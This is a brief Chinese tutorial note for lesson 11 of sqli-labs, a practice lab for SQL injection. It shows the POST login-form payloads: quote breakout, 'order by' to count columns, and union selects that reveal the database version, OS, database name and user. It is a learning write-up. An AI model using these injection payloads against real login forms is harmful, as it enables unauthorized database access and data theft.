sqli-labs/11

sqli-labs/lesson-11

第11关

打开第11关,index.php,添加echo $sql.

利用burp抓包,并且此代码复制过来.

注意此处有单引号,所以注入时,也要有单引号.

uname=admi' order by 2 #&passwd=admin&submit=Submit

利用order by n,猜解有几个id

利用hackbar查询,order by 2,判断有几个id. 后面记得加#或者--+,这是注释符.

接下来进行联合查询.在字段1,2,处进行查询,

信息收集关键词有:

1. user() root@localhost
2. version() 5.5.53
3. @@version_compile_os Win32
4. database() security

uname=admi' union select version(),@@version_compile_os #&passwd=admin&submit=Submit

uname=admi' union select database(),user() #&passwd=admin&submit=Submit

利用burp的repeater模块也可以进行sql注入

总结:@@version_compile_os 有两个@@符号不要忘,注释符不要忘